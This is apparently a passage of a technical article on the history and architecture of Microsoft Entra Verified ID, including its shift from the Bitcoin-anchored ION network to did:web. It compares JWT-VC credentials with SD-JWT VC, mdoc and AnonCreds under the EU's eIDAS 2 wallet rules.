Five years after CardSpace was discontinued, the movement rebooted in public. In April 2016 Christopher Allen, a co-author of the IETF Transport Layer Security (TLS) Security Standard [@allen-about], published The Path to Self-Sovereign Identity [@allen-ssi-2016]. The essay named the four eras of online identity (centralized, federated, user-centric, self-sovereign), gave the new model the name that stuck, and offered ten SSI principles drawn line by line from Cameron's Laws.

The Decentralized Identity Foundation (DIF) was organized in 2017 as a project of the Joint Development Foundation, with Microsoft as a founding member [@dif-org-faq]; the Joint Development Foundation itself joined the Linux Foundation at the end of 2018.

Microsoft committed in writing on 12 February 2018, in a strategy post by Ankur Patel naming four building blocks the company would invest in: decentralized identifiers, verifiable credentials, identity hubs for off-chain personal data, and a universal resolver for any DID method [@patel-2018]. Fifteen months later, in May 2019, Alex Simons and Daniel Buchner turned that strategy into an architectural commitment: Microsoft would invest in a Bitcoin-anchored Layer-2 network it called ION, built on the DIF Sidetree protocol, and presented as a way to scale decentralized identifier writes to the rate of public adoption [@simons-buchner-2019].

By 2019 Microsoft had committed to the architecture in writing. It had not yet committed any production code. The next question was what trust root the new system would use, and that answer would change three times in the seven years that followed.

flowchart LR A["2005 Cameron publishes Laws of Identity"] --> B["2006 CardSpace ships with Vista"] B --> C["2011 CardSpace discontinued"] C --> D["2016 Allen names SSI"] D --> E["2017 DIF founded"] E --> F["2018 Patel strategy post"] F --> G["2019 Simons and Buchner announce ION"] G --> H["2022 Entra Verified ID GA"]

3. The Federation Stack and the SSI Premise

To understand why anyone thought SSI was a successor architecture, picture the most boring identity flow you have: signing into a third-party app with your work email.

The OpenID Connect (OIDC) protocol that almost every modern federation flow speaks works by having your employer's identity provider (the IdP) mint a short-lived signed ID Token, audience-scoped to one specific relying party (RP), the moment you log in [@openid-connect-core]. The RP redirects you to the IdP, the IdP authenticates you, the IdP returns a JWT addressed only to that RP, and the RP verifies the IdP's signature against a JSON Web Key Set the IdP publishes at a well-known URL. SAML and WS-Federation differ in syntax but not in shape.

Federation works. It is what every meaningful enterprise login uses today. It is also engineered around three structural choices that the SSI movement called out as compromises:

The IdP is online at verification time. Each RP-IdP pair re-runs the dance. The IdP knows every login: where, when, to whom. That is a powerful surveillance vantage and a single point of compromise.
The user never holds the credential. You cannot take a Microsoft-issued "employed at Microsoft" assertion and show it to a relying party your employer did not pre-integrate. The IdP authorizes each RP, not the user.
There is no story for selective claim disclosure. An OIDC ID Token reveals every claim in the audience-specific payload to that RP. There is no engineering hook for "prove you are over 18 without revealing your birthdate."

The structural answer the SSI movement proposed is simple to state. If the user could hold a signed assertion that any verifier could check against the issuer's public key, without the issuer being online during verification, all three complaints dissolve. The credential becomes a portable object the user carries from verifier to verifier. The issuer's role collapses to a one-time signing event plus a way to publish a public key and a revocation status. The verifier's role collapses to fetching that key and checking the signature.

A tamper-evident, cryptographically signed claim about a subject, issued by an issuer in a format that a verifier can check independently of the issuer at verification time. The W3C Verifiable Credentials Data Model defines the abstract structure; the on-the-wire format can be JSON-LD with a Data Integrity proof, or a JSON Web Token signed under JWS (JWT-VC) [@w3c-vc-1-0]. A URI of the form `did::` that resolves to a DID Document containing the subject's public keys and service endpoints. The W3C DID Core specification standardizes the abstract data model and lists more than 100 experimental DID methods that each define their own resolution and key-rotation rules [@w3c-did-core].

That observation is the entire intellectual content of the Verifiable Credentials movement, and the W3C Verifiable Credentials Data Model 1.0 (19 November 2019) is its first standardised expression [@w3c-vc-1-0]. The standard explicitly permits two on-the-wire encodings of the same abstract data model: a JSON-LD document with a Data Integrity proof, and a JSON Web Token signed under JWS. Microsoft would later pick the second of those two encodings, and the choice would matter more than the standard's authors anticipated.

VCs solve the user-as-holder problem, but only if the verifier has some way to resolve the issuer's public key when the issuer is not online. That addressing problem is what DIDs are for, and choosing the DID method is where every decentralized-identity vendor's architecture begins.

4. Five Generations of Verified Identity

Five generations of architecture lead to the product Microsoft ships today. Two of them belonged to Microsoft. The middle one was Microsoft's most ambitious bet, and the one Microsoft retired first.

G1: The Whitepaper Era (2018-2019)

Patel's February 2018 strategy post named the four building blocks (DIDs, Verifiable Credentials, Identity Hubs, Universal DID Resolver) but committed to no concrete trust root [@patel-2018]. Fifteen months later the trust root arrived, named, in the Simons and Buchner blog post: a Layer-2 network on Bitcoin called ION, built on the DIF Sidetree protocol [@simons-buchner-2019]. The original 2019 design target was "tens of thousands of operations per second" on the public mainnet. There was no production code yet, only a public-preview wallet (Microsoft Authenticator) and a public commitment to ship.

G2: ION Mainnet (2020-2021)

A DIF Ratified Specification that batches thousands of DID create, update, recover, and deactivate operations into a single anchor transaction on an underlying ledger. Sidetree itself is ledger-agnostic; ION was the Sidetree-on-Bitcoin instantiation [@dif-sidetree]. Editors of the spec: Daniel Buchner (Microsoft), Orie Steele (Transmute), and Troy Ronda (SecureKey).

The June 2020 ION beta gave way to the v1 mainnet launch on 25 March 2021 [@ion-liftoff-2021]. Buchner's announcement post on the Microsoft Identity Standards blog framed it as the moment "decentralized identifiers, anchored on Bitcoin via Sidetree" became real infrastructure [@bitcoinmag-ion-v1].

The DIF ION project page documents the demonstrated capacity as "thousands of DID operations per second across the network" with a strongly eventually consistent model [@ion-dif]. The earlier "tens of thousands" figure had been the 2019 design target, not the demonstrated mainnet capacity, and the public liftoff post itself recorded the "thousands of operations per second" figure once mainnet was live [@ion-liftoff-rss].

Microsoft Authenticator served as the preview holder wallet; an ION operator ran a public node; Bitcoin transaction fees and IPFS pinning paid the operational cost of the trustless anchoring story. The ION repository on GitHub remains live as a DIF project [@ion-github].

G3: Entra Verified ID GA (2022)

Fourteen months after launching ION on Bitcoin, Microsoft made two architecturally decisive choices that did not look decisive at the time.

On 14 June 2022, an entry in the Verified ID whats-new changelog added did:web as a supported trust system alongside did:ion [@ms-learn-whatsnew]. On 8 August 2022, the product went generally available under the new Entra brand [@entra-ga-2022].

The second decisive choice was the credential format. The W3C VC Data Model permits both JSON-LD with Data Integrity Proofs and JSON Web Tokens; Microsoft picked JWT-VC, an artifact signed end-to-end under JWS [@rfc-7515]. Both choices were small in the changelog and load-bearing for the pivot that followed.

A Verifiable Credential encoded as a JSON Web Token and signed under JSON Web Signature (JWS, RFC 7515 [@rfc-7515]). The encoding rules are specified in section 6.3.1 of the W3C VC Data Model v1.1 [@w3c-vc-1-1]. Because the JWS is computed over the whole payload, a JWT-VC is presented atomically: you reveal every claim, or none. This is the format Microsoft Entra Verified ID issues.

G4: The Pivot (2023-2024)

The product's first marquee deployment landed on 12 April 2023: LinkedIn's Workplace Verification feature, built on Entra Verified ID, launched with "more than 70 organizations representing millions of LinkedIn members, including companies like Accenture, Avanade, and Microsoft" [@chik-linkedin-2023].

Eight months later, in December 2023, the changelog carried the sentence the entire seven-year arc had been building toward: "The option of selecting did:ion as a trust system is removed. The only trust system available is did:web." [@ms-learn-whatsnew].

In early 2024, Microsoft's public ION node was wound down. No primary Microsoft source pins a specific day, so the conservative wording is "early 2024" with the December 2023 admin-portal removal as the milestone the official record actually attests.

Specific calendar-day dates for the public ION node retirement circulate widely in the SSI community, but no primary Microsoft source (Microsoft Learn changelog, the Microsoft Identity Standards blog archive, the ION GitHub commit history, DIF announcement archives) confirms a specific day. The December 2023 admin-portal removal is the primary-source-attested milestone; the public-node wind-down is best described as "early 2024."

G5: The Buildout (2024-2026) and the EUDI Forcing Function

Quick Setup, which auto-provisions a did:web DID for a tenant, went GA in April 2024. Face Check, an Azure AI face-matching add-on, went GA on 12 August 2024. did:web:path (supporting per-tenant DID paths under one host) opened on request in September 2024 [@ms-learn-whatsnew]. On the standards side, OpenID for Verifiable Presentations 1.0 was approved as a Final Specification in July 2025 [@openid4vp-final-announce] [@openid4vp-final-spec], and OpenID for Verifiable Credential Issuance 1.0 followed in September 2025 [@openid4vci-final-announce] [@openid4vci-final-spec]. Account recovery with Verified ID reached GA in May 2026; the legacy secp256k1 signing algorithm is scheduled for retirement on 1 July 2026 [@ms-learn-whatsnew].

Meanwhile, on 20 May 2024, Regulation (EU) 2024/1183 (eIDAS 2) entered into force, setting a 24-month deadline for every Member State to provision at least one European Digital Identity Wallet, and an 18-month follow-on for mandatory private-sector acceptance [@eidas-2]. The EUDI Architecture and Reference Framework, currently at v2.9 (May 2026), mandates SD-JWT VC and ISO/IEC 18013-5 mdoc as the two baseline credential formats [@eudi-arf] [@eudi-arf-2-9]. Neither is currently issued by Entra Verified ID.

Generation	Trust root	Credential format	Selective disclosure	Throughput / Cost	Status (May 2026)
G0 OIDC federation	IdP (online)	OIDC ID Token (JWS)	No	Sub-100 ms	In production at scale
G1 Whitepaper era	Promised: ledger	Promised: JSON-LD	Promised: BBS-style	n/a	Superseded
G2 ION mainnet	Bitcoin + IPFS + Sidetree	JSON-LD or JWT-VC	None at GA	Thousands of DID ops/sec [@ion-dif]	Retired Dec 2023
G3 Entra GA (Aug 2022)	`did:web` and `did:ion`	JWT-VC	None	did:web one HTTPS GET	Superseded by G4
G4 Entra did:web-only	`did:web` (DNS + CA)	JWT-VC	None	One HTTPS GET	Current shipping product
G5 EUDI-aligned	TBD	SD-JWT VC + mdoc	Yes (hash-based, mdoc selective)	TBD	EU mandate; Microsoft commitment open

Two generations are in production today. One is the one Microsoft ships. The other is the one the EU is preparing to mandate. They do not yet agree on a credential format. That gap is the central open question of the article's last third.

flowchart LR G1["G1 (2018-2019) Whitepaper four blocks: DIDs, VCs, hubs, resolver"] -->|"add Bitcoin anchoring"| G2["G2 (2020-2021) ION mainnet Sidetree on Bitcoin"] G2 -->|"add did:web, JWT-VC; brand as Entra"| G3["G3 (Aug 2022) Entra Verified ID GA"] G3 -->|"remove did:ion (Dec 2023)"| G4["G4 (2024-2026) did:web-only Entra"] G4 -->|"open: add SD-JWT VC + mdoc?"| G5["G5 EUDI-aligned (TBD by Dec 2026)"]

5. The Breakthrough: Why did:web Was the Pivot

The decisive sentence in the entire Entra Verified ID story is not in a press release. It is in the Introduction of a W3C Community Group draft:

"DIDs that target a distributed ledger face significant practical challenges in bootstrapping enough meaningful trusted data around identities to incentivize mass adoption. We propose a new DID method using a web domain's existing reputation." [@did-web-spec]

That is the W3C did:web Method Specification arguing, in its own opening paragraph, that the trust-bootstrapping problem ledger-anchored DIDs were designed to solve is the same problem that prevents ledger-anchored DIDs from being adopted at scale. The proposed alternative reuses something the world already has: DNS plus the X.509 certificate-authority system.

What `did:web` actually does

A did:web:example.com resolves, by the algorithm in the spec, to https://example.com/.well-known/did.json. The file is a plain JSON DID Document containing the subject's public keys and service endpoints. A did:web:example.com:tenants:acme resolves to https://example.com/tenants/acme/did.json. That is the whole resolution algorithm. There is no ledger to query, no Sidetree batch to replay, no anchor transaction to wait for, no IPFS pin to refresh.

{` // Convert a did:web identifier into the URL where its DID document lives. function didWebToUrl(did) { if (!did.startsWith('did:web:')) throw new Error('not a did:web'); const methodSpecific = did.slice('did:web:'.length); // Split on ':' (path separator). Percent-decode each segment. const parts = methodSpecific.split(':').map(decodeURIComponent); const host = parts[0]; const pathSegments = parts.slice(1); if (pathSegments.length === 0) { return 'https://' + host + '/.well-known/did.json'; } return 'https://' + host + '/' + pathSegments.join('/') + '/did.json'; }

console.log(didWebToUrl('did:web:example.com')); // https://example.com/.well-known/did.json console.log(didWebToUrl('did:web:example.com:tenants:acme')); // https://example.com/tenants/acme/did.json console.log(didWebToUrl('did:web:port-example.com%3A8443:tenants:acme')); // https://port-example.com:8443/tenants/acme/did.json `}

Why this collapsed ION's complexity

Walk through the ION costs that disappear. No Bitcoin full node to run. No IPFS pinning service to maintain. No Sidetree daemon batching CRUD operations. No per-batch on-chain fee. No 60-minute eventual-consistency window before a key rotation propagates. No public-node retirement risk. Key rotation is a JSON file edit; resolution is one HTTPS GET. Microsoft Learn now describes its production identifier system in exactly those terms: "Microsoft currently supports the did:web trust system. The did:web trust system is a permission-based model that allows trust using a web domain's existing reputation." [@ms-learn-intro].

did:web:path opened on request in September 2024 [@ms-learn-whatsnew]. It allows a tenant to namespace its DID under a path on a shared host (for example, did:web:contoso.com:tenants:acme), avoiding the need to register a unique subdomain per tenant. The resolution algorithm above handles both shapes.

Why every enterprise issuer already had everything did:web requires

This is the moment to state the load-bearing argument of the whole article plainly. Enterprise issuers, banks, universities, hospitals, government agencies, and employers already own DNS names. They already pay for X.509 certificates. They already have publicly known organisational identities tied to those names. They have published HR-system endpoints, OAuth issuers, and JWKS URLs on those names for years. The trustless permissionless discovery story that ION solved is a story about new issuers showing up without prior reputational anchors. The customers who actually wrote cheques for Entra Verified ID are exactly the population whose reputational anchor was already on DNS.

Key idea: Enterprise issuers never needed permissionless issuer discovery. They already had publicly known organisational identities anchored to DNS and the certificate-authority system. ION solved a problem this population did not have, while imposing operational costs (full-node operation, IPFS pinning, anchoring fees, eventual-consistency latency) that this population did have. did:web did not lose to ION on cryptography; it won on operational fit.

The honest concession

did:web is "decentralized" only in the loose sense that there is no central registry of issuers. The trust sits squarely on DNS plus the certificate-authority system. If your registrar suspends your domain, your DID document is unreachable. If a certificate authority mis-issues for your domain, an attacker can stand up a competing DID document at the same identifier.

The W3C did:web spec's Security and Privacy Considerations name this inheritance directly: all DNS security considerations apply, and all TLS security considerations apply [@did-web-spec]. SSI purists consider this a concession that empties the SSI label of meaning. They are not wrong to make that argument; they are choosing a different definition of "decentralized" than the operational one that won.

Note: There is a sharp definition of "decentralized" (no trusted intermediary, permissionless write, censorship resistance) and there is an operational definition (no single central registry whose failure takes down the whole system, multi-party governance of the standards layer). did:web is decentralized in the second sense and not in the first. ION attempted the first; it shipped, it ran, and the customers who paid for the product did not value the property highly enough to fund its operational cost.

Binding the DID back to the domain

There is one extra step did:web needs at the application layer that ION did not. The DID Document at https://example.com/.well-known/did.json is served by the domain owner; nothing inside the JSON, by itself, proves that the domain owner is the same entity as the DID subject. The DIF Well-Known DID Configuration document closes that loop with a signed JSON file at https://example.com/.well-known/did-configuration.json containing one or more domain-linkage credentials issued by the DID and asserting "I, this DID, claim this domain" [@well-known-did-config]. Verifiers fetch both files, check the linkage, and accept the binding.

A specification for a JSON file served at `/.well-known/did-configuration.json` that contains domain-linkage credentials, signed by a DID, asserting the DID owns the host domain. Used by `did:web` deployments to convert a domain-served DID Document into a verifiable two-way binding between the DNS name and the DID identifier [@well-known-did-config]. flowchart TD subgraph ION["ION resolution (G2, retired)"] I1[Verifier wants issuer key] --> I2[Query ION node] I2 --> I3[Read Bitcoin anchor txn] I3 --> I4[Fetch Sidetree batch from IPFS] I4 --> I5[Replay operation history] I5 --> I6[Reconstruct DID Document] end subgraph WEB["did:web resolution (G4, current)"] W1[Verifier wants issuer key] --> W2["HTTPS GET /.well-known/did.json"] W2 --> W3[Parse JSON, read public key] end

Two production deployments shipped on this architecture. LinkedIn Workplace Verification runs at the scale of hundreds of millions of LinkedIn profiles [@chik-linkedin-2023]. The NHS Digital Staff Passport ran on it across a four-Trust pilot, after migrating from a Sovrin-anchored architecture to did:web [@dif-condatis-blog].

A third, smaller deployment proved out the same stack for higher education: RMIT University engaged Condatis and Microsoft on a Proof of Value covering digital student cards, training-certificate issuance, and alumni-transcript verification on Entra Verified ID [@condatis-rmit]. Neither of the production-scale deployments would have shipped on ION; all three shipped on did:web. The next question is what those deployments are doing under the hood.

6. The Stack Microsoft Ships in May 2026

The "supported standards" table on Microsoft Learn is the most honest single document Microsoft publishes about Verified ID. It lists exactly what ships and is silent on everything else [@ms-learn-supported]. Walking it row by row, in the order the wire flow uses each layer, gives the cleanest possible picture of the May 2026 product.

Identifier

did:web only, with did:web:path available on request since September 2024 [@ms-learn-whatsnew]. did:ion is gone. did:key and did:jwk are not listed as trust systems. The Microsoft Resolver is scoped to did:web [@ms-learn-intro].

Data model

W3C VC Data Model v1.1 (3 March 2022) [@w3c-vc-1-1]. Microsoft Entra Verified ID has not yet adopted v2.0, which became a W3C Recommendation on 15 May 2025 [@w3c-vc-2-0]. The one-version lag is documented and small in scope; v1.1 remains in widespread production use industry-wide.

Credential format

JWT-VC: a JSON payload signed under JWS (RFC 7515 [@rfc-7515]), encoded according to section 6.3.1 of the VC Data Model v1.1 [@w3c-vc-1-1]. JSON-LD Data Integrity Proofs are absent from Microsoft's supported-standards table. The fairest framing is that this is a documented omission rather than a public rejection; the consequence (no JSON-LD-native context handling, no canonicalisation step, no semantic web integration) is the same in either case.

Issuance protocol

OpenID for Verifiable Credential Issuance (OpenID4VCI). Microsoft Learn currently references Implementer Draft 11 of the specification [@ms-learn-supported]; the Final 1.0 was approved by the OpenID Foundation in September 2025 [@openid4vci-final-announce], with the spec itself at [@openid4vci-final-spec]. Final 1.0 is closely compatible with Draft 11 in the wire shape but tightens several optionalities.

The OpenID4VCI version lag is a typical specification-implementation gap: the Final approval (102 approve votes, 1 object, 12 abstain [@openid4vci-final-announce]) came months after Microsoft built its current implementation. Final 1.0 conformance is a near-trivial update for any deployment already on Draft 11.

The OAuth-2.0-based protocol by which a credential issuer offers a Verifiable Credential to a wallet. The wallet redeems a one-time code (the *credential offer*) at a token endpoint, then presents the resulting access token at a credential endpoint to receive the signed credential. Final 1.0 approved September 2025 [@openid4vci-final-spec].

Presentation protocol

OpenID for Verifiable Presentations 1.0, Final, July 2025 [@openid4vp-final-announce] [@openid4vp-final-spec]. The verifier sends the wallet a presentation_definition (using DIF Presentation Exchange semantics) and receives back a Verifiable Presentation containing one or more credentials.

A wallet-agnostic protocol for a verifier (relying party) to request a verifiable presentation from a wallet, using OAuth-2.0 redirect or cross-device QR/deep-link flows. Final 1.0 ratified July 2025 by 79 approve votes to 2 object and 17 abstain [@openid4vp-final-announce].

User-authentication leg

Self-Issued OpenID Provider v2 (SIOPv2), the OpenID-Connect-style layer that authenticates the holder to the verifier inside the OpenID4VP flow [@siop-v2].

The Self-Issued OpenID Provider v2 specification, which lets a wallet act as its own OpenID Connect issuer, signing an ID Token with the holder's key. The user-authentication leg of the OpenID-for-VC stack [@siop-v2].

Query language

DIF Presentation Exchange v2.0.0, ratified 3 November 2022 [@dif-pe-2]. The verifier expresses what it wants ("a VC of type WorkplaceCredential issued by an issuer in this list"); the wallet returns a presentation submission mapping its held credentials onto the request.

Domain binding

DIF Well-Known DID Configuration, as described in section 5 [@well-known-did-config]. The verifier downloads the issuer's /.well-known/did-configuration.json and confirms the bidirectional binding between the DID and the DNS host.

Revocation

W3C VC Status List 2021. Microsoft Learn currently references the Working Draft WD-vc-status-list-20230427; W3C has since published the Bitstring Status List Recommendation as the canonical evolution of the same bitstring revocation construction [@vc-bitstring-status]. Microsoft has not migrated to the Recommendation URL; the underlying mechanism is the same compressed bitstring construction in both.

Algorithms

ES256K (secp256k1, legacy, scheduled for deprecation 1 July 2026 [@ms-learn-whatsnew]), EdDSA, and ES256 (P-256, the default for credentials created after February 2024). All three are JWS algorithm identifiers; there are no algorithm choices outside the JOSE family.

Holder wallet

Microsoft Authenticator on iOS and Android. There is no third-party wallet support at GA [@ms-learn-intro].

Premium add-on

Face Check, an Azure AI face-matching service that scores a live selfie against a photo claim on the credential, available as a premium add-on. Face Check went GA on 12 August 2024 [@ms-learn-whatsnew] [@ms-learn-facecheck].

What is NOT in the table

The list of items Microsoft Learn does not list as supported is short and worth stating out loud: SD-JWT VC; BBS signatures; ISO/IEC 18013-5 mdoc; JSON-LD Data Integrity Proofs; selective disclosure of any kind; third-party wallets.

Note: Three of the items on the "not supported" list (SD-JWT VC, ISO mdoc, selective disclosure) are the same three items the European Union's EUDI Wallet ARF has just made mandatory for the EU regulated market [@eudi-arf]. The article's last third explains what happens when those two lists collide.

Layer	Standard / version	Source
Identifier	`did:web` (plus `did:web:path` on request)	Microsoft Learn DID overview [@ms-learn-intro]
Data model	W3C VC Data Model v1.1 (March 2022)	W3C [@w3c-vc-1-1]
Credential format	JWT-VC (JWS over JSON, RFC 7515)	RFC 7515 [@rfc-7515]; VC v1.1 §6.3.1 [@w3c-vc-1-1]
Issuance protocol	OpenID4VCI (Microsoft Learn: Implementer Draft 11)	Final 1.0 [@openid4vci-final-spec]
Presentation protocol	OpenID4VP 1.0 (Microsoft Learn: OpenID4VC landing)	Final 1.0 [@openid4vp-final-spec]
Authentication leg	SIOPv2	OpenID Foundation [@siop-v2]
Query language	DIF Presentation Exchange v2.0.0	DIF [@dif-pe-2]
Domain binding	DIF Well-Known DID Configuration	DIF [@well-known-did-config]
Revocation	W3C VC Status List 2021 (WD-vc-status-list-20230427)	Recommendation form: Bitstring Status List [@vc-bitstring-status]
Algorithms	ES256K (deprecating July 2026), EdDSA, ES256 (P-256, default)	Microsoft Learn supported standards [@ms-learn-supported]
Holder wallet	Microsoft Authenticator (iOS, Android)	Microsoft Learn DID overview [@ms-learn-intro]
Premium add-on	Face Check (Azure AI face matching, GA 12 Aug 2024)	Microsoft Learn whats-new [@ms-learn-whatsnew]

{// Pseudocode for the verifier's job. A real implementation uses a JOSE library. async function verifyJwtVc(jwtVc) { const [headerB64, payloadB64, sigB64] = jwtVc.split('.'); const header = JSON.parse(atob(headerB64)); const payload = JSON.parse(atob(payloadB64)); // 1. Pull the issuer DID from the VC payload. const issuerDid = payload.iss || payload.vc.issuer; // 2. Resolve did:web to a URL and fetch the DID document. const url = didWebToUrl(issuerDid); const didDoc = await fetch(url).then((r) => r.json()); // 3. Find the verification method whose id matches the JWS kid. const vm = didDoc.verificationMethod.find((m) => m.id === header.kid); const jwk = vm.publicKeyJwk; // 4. Verify the JWS signature over header.payload using the JWK. const ok = await joseVerify(headerB64 + '.' + payloadB64, sigB64, jwk); // 5. Check the status list entry to confirm the VC is not revoked. if (payload.vc.credentialStatus) await checkStatusList(payload.vc.credentialStatus); return ok; }}

The verifier needs a JOSE library and an HTTPS client. That is the whole moving-parts inventory. The simplicity is precisely what won.

sequenceDiagram participant Iss as Issuer Backend participant Auth as Microsoft Authenticator participant Ver as Verifier participant DNS as Issuer did:web host Iss->>Auth: OpenID4VCI credential offer Auth->>Iss: redeem code, request credential Iss->>Auth: signed JWT-VC Note over Auth: wallet stores VC Ver->>Auth: OpenID4VP presentation_definition Auth->>Ver: VP JWT containing VC Ver->>DNS: HTTPS GET /.well-known/did.json DNS->>Ver: DID Document with issuer JWK Ver->>Ver: verify VC signature, check status list Ver->>Auth: accept or reject

7. The Other Wallets Microsoft Has to Live With

Microsoft Entra Verified ID is not the only wallet a relying party in 2026 has to think about. There are four competing stacks, each with a different theory of where the trust root sits, and each of them is shipping in production today.

M-B: The EUDI Wallet (European Union)

The EU's European Digital Identity Wallet is a regulatory product, not a single vendor's product. Regulation (EU) 2024/1183 (eIDAS 2) requires every Member State to provision at least one wallet within 24 months of the relevant implementing acts entering into force, and to lift mandatory private-sector acceptance to all regulated relying parties 18 months after that [@eidas-2].

The EUDI Architecture and Reference Framework, currently published as v2.9 (May 2026), mandates two baseline credential formats: SD-JWT VC (a draft IETF profile on top of the SD-JWT primitive, RFC 9901 [@rfc-9901] [@sd-jwt-vc-draft]) and ISO/IEC 18013-5 mobile documents (mdoc) [@iso-18013-5] [@eudi-arf] [@eudi-arf-2-9]. BBS-style unlinkable signatures are listed as optional and future.

A Verifiable Credential profile that splits each disclosable claim into a salted hash inside the signed JWT, with the salt-and-value pairs released to verifiers a la carte. Built on the SD-JWT primitive (RFC 9901, November 2025 [@rfc-9901]), defined by the IETF OAuth working group draft `draft-ietf-oauth-sd-jwt-vc` (current revision draft-16, 24 April 2026, submitted to the IESG for publication [@sd-jwt-vc-draft]). Gives selective disclosure but not unlinkability across presentations. The ISO/IEC 18013-5:2021 standard for mobile driver's licences, defining a CBOR-encoded credential format with selective disclosure of individual data elements and a CTAP-style cross-device presentation protocol [@iso-18013-5]. ISO/IEC TS 18013-7, published 7 October 2024, adds an online-presentation profile for the same mdoc format [@iso-18013-7] [@aamva-iso-alert].

The trust-list machinery is set out in Commission Implementing Regulation (EU) 2025/849, which requires each Member State to publish its list of certified wallet solutions in machine-readable form for inclusion in a consolidated EU list [@eur-lex-cir-2025-849]. Four EU-funded Large-Scale Pilots are exercising the architecture: POTENTIAL (general public services), DC4EU (digital credentials for education), EWC (cross-border wallet interop), and NOBID (Nordic-Baltic payments) [@potential-lsp] [@dc4eu-lsp] [@nobid-lsp].

M-C: Apple Wallet ID-in-Wallet and Google Wallet Digital ID

The two consumer mobile-OS wallets converge on ISO/IEC 18013-5 mdoc as the credential format and X.509 IACA (Issuing Authority Certificate Authority) trust chains as the trust root [@iso-18013-5]. In-person presentation uses the QR-plus-BLE handover defined by ISO/IEC 18013-5; the new online-presentation profile is defined by ISO/IEC TS 18013-7, with an AAMVA Special Alert published on the October 2024 release [@iso-18013-7] [@aamva-iso-alert].

In North America, the AAMVA Digital Trust Service (DTS) operates the public-key trust list for state-issued mDLs [@movemag-mdl] [@aamva-mdl-guidelines]. The California DMV's TruAge consumer feature, built on SpruceID, is the visible North American example of an mDL-in-wallet age-verification flow [@dmv-ca-truage]. The Secure Technology Alliance maintains a public tracker of mDL implementation status state by state [@mdl-tracker]. Inclusion in Apple Wallet or Google Wallet is platform-mediated.

The AAMVA DTS is the United States analogue of the EUDI Trust List. The architectural lesson is the same in both: a federated wallet model requires a public, signed, machine-readable list of which issuers a relying party should accept, and somebody has to operate that list. Microsoft Entra Verified ID currently relies on per-tenant verifier configuration to fulfil the same role [@movemag-mdl].

M-D: Hyperledger Aries and AnonCreds

The SSI-purist lineage is alive and shipping, just not at Microsoft. AnonCreds v1.0 is the current canonical specification, hosted at the AnonCreds Working Group's GitHub Pages site after the move from Hyperledger to LF Decentralized Trust [@anoncreds-spec]. The cryptographic core is documented in the Khovratovich, Lodder, and Parra Ursa AnonCreds paper [@ursa-anoncreds].

The credential is issued under a Camenisch-Lysyanskaya or BBS-style signature. Presentations use a zero-knowledge proof that re-randomises the signature, delivering unlinkability across presentations as a theorem rather than as a best-effort engineering claim. DIDComm v2 is the transport, offering a peer-to-peer messaging substrate that does not depend on HTTPS redirects [@didcomm-spec]. Type-3 cryptographic accumulators handle revocation at scale without leaking the holder's identity to the issuer.

The trade-offs are presentation latency in the tens to low hundreds of milliseconds, proof sizes in the kilobytes, and a smaller pool of conformant verifier implementations than the OpenID4VP world has.

M-E: Third-party multi-format vendors

Mattr, SpruceID, and Trinsic each ship issuers and verifiers that handle multiple formats (SD-JWT VC, JWT-VC, ISO mdoc, BBS-VC) over the same OpenID4VP transport.

Mattr powers the New Zealand Department of Internal Affairs' NZ Verify product, which checks ISO 18013-5 mobile driver licences from 18 US states, Puerto Rico, and Queensland [@dia-nzverify]. SpruceID's Success Stories list names the California DMV, the Utah Department of Government Operations, and the U.S. Department of Homeland Security as headline deployments [@spruceid-success], with the DHS Silicon Valley Innovation Program write-up at [@spruceid-dhs]. Trinsic announced a February 2026 partnership with IDEMIA Public Security to accept mDLs across New York, Arkansas, Iowa, West Virginia, and Kentucky [@trinsic-idemia] [@prnewswire-trinsic].

These vendors are the parties who, if Microsoft does not add SD-JWT VC or mdoc issuance to Entra Verified ID, will fill the EUDI-interop gap for Microsoft-tenant relying parties.

Stack	Credential format(s)	Identifier	Selective disclosure	Unlinkability	Trust root	Wallet pluralism	EU regulatory mandate
M-A Entra Verified ID	JWT-VC	`did:web`	No	No	DNS + CA	Microsoft Authenticator only	No
M-B EUDI Wallet	SD-JWT VC + mdoc	Implementation-dependent	Yes (hash-based; selective on mdoc)	No baseline (BBS optional/future)	Member-State trust lists	Yes, by design	Mandatory by 24 Dec 2026
M-C Apple/Google Wallet	ISO mdoc	X.509 IACA	Yes (selective on mdoc)	No	AAMVA DTS / IACA chain	Platform-mediated	Possible interop, not mandated
M-D Aries / AnonCreds	CL or BBS over JSON	`did:indy`, `did:peer`, etc.	Yes	Yes	Permissioned ledger or DID network	Multiple Aries wallets	Optional under EUDI ARF
M-E Multi-format vendors	SD-JWT VC, JWT-VC, mdoc, BBS-VC	`did:web`, `did:jwk`, `did:key`	Yes (format-dependent)	Yes when BBS	Per-deployment	Vendor or government-issued	Optional

The eIDAS 2 deadlines reach beyond the EU's borders in two ways.

First, any non-EU enterprise that sells regulated services into the EU (banks, telecoms, large online platforms, transport) becomes an obligated relying party that must accept EUDI Wallet presentations once the private-sector acceptance window closes [@eidas-2].

Second, the EUDI ARF's baseline format choice creates a gravitational field for every vendor that wants to ship a single wallet across multiple jurisdictions. The AAMVA mdoc story in the United States [@aamva-iso-alert] is converging on the same on-the-wire shape the EUDI ARF mandates [@eudi-arf]. The "two parallel formats" world is rapidly becoming "one format the EU mandated and one format the rest of the world also picked." Microsoft's current JWT-VC commitment sits outside both.

Four stacks, four trust roots, four credential formats. The technical layer is converging on OpenID4VP. The format layer is fragmenting. The trust-framework layer (which issuers are authoritative for which credentials in which jurisdiction) is still wide open.

8. The Theoretical Limits of Atomic JWT-VC

There are three things JWT-VC cannot do that the original 2019 vision said the new architecture would do. None of the three is a bug. All three are theorems about the format.

Concession 1: No selective disclosure

A JWS computes a signature over a fixed payload [@rfc-7515]. To verify, the verifier reconstructs the exact bytes that were signed, recomputes the signature, and compares. If even one bit of the payload changes, verification fails. That property is what makes the JWS authentic; it is also what makes selective disclosure impossible inside a JWT-VC. You reveal every claim, or none.

The two production-ready ways to escape this constraint each pick a different cryptographic trick. SD-JWT VC keeps the signature whole but replaces each disclosable claim in the signed payload with a salted SHA-256 hash; the verifier receives the salt-value pairs only for the claims the holder chooses to disclose, and recomputes the hashes to confirm they appear in the signed payload [@rfc-9901] [@sd-jwt-vc-draft]. BBS signatures go further: the holder can re-randomise the signature itself at presentation time and prove knowledge of a signature on a subset of messages without ever revealing the original signature [@bbs-draft-10].

Both routes change the on-the-wire format. Neither is reachable from inside JWT-VC. Microsoft's "no selective disclosure today" is therefore a format-migration decision, not a cryptographic engineering decision. The Anonymous Credentials companion article treats the mathematical structure of the three families (hash-disclosure, CL signatures, BBS signatures) in depth.

Concession 2: Linkability across presentations

